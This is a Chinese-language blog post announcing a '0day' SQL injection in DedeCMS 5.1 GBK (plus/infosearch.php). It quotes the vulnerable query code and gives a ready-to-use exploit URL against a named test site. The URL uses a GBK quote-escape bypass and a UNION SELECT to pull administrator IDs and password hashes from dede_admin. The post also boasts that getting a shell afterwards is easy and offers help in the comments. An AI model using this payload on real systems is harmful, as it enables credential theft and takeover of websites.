首页 > 脚本相关 > dedecms gbk版0day

dedecms gbk版0day

2008年11月3日 admin 发表评论 阅读评论

貌似又是通过特殊符号绕开GBK的转换……

漏洞文件:plus/infosearch.php

测试版本:5.1 gbk

描述:$q变量没有过滤直接进入查询,导致注入出现。代码如下:

PHP代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14

q = trim($q);
if($areaid > 0) {
$wheresql = "areaid=$areaid and ";
}
 
$query = "select ID,typeid,title,memberID,writer,senddate from #@__infos where $wheresql title like '%$q%' order by senddate desc";
 
$dlist = new DataList();
 
$dlist->pageSize = 20;
$dlist->SetParameter("q",$q);
$dlist->SetParameter("action",'search');
$dlist->SetParameter("areaid",$areaid);
$dlist->SetSource($query);

“‘”突破了,那就照常注入。

测试站:

http://www.SpookZanG.Net/plus/infosearch.php?action=search&q=%cf’%20union%20select%201,2,id,4,pwd,6%20from%20dede_admin/*

至于后台拿shell,找不到后台的一样可以轻松拿到shell.不会的留言。

还有几个文件存在注入问题,象feedback.php,后续发放分析

分类: 脚本相关 标签: , , , ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.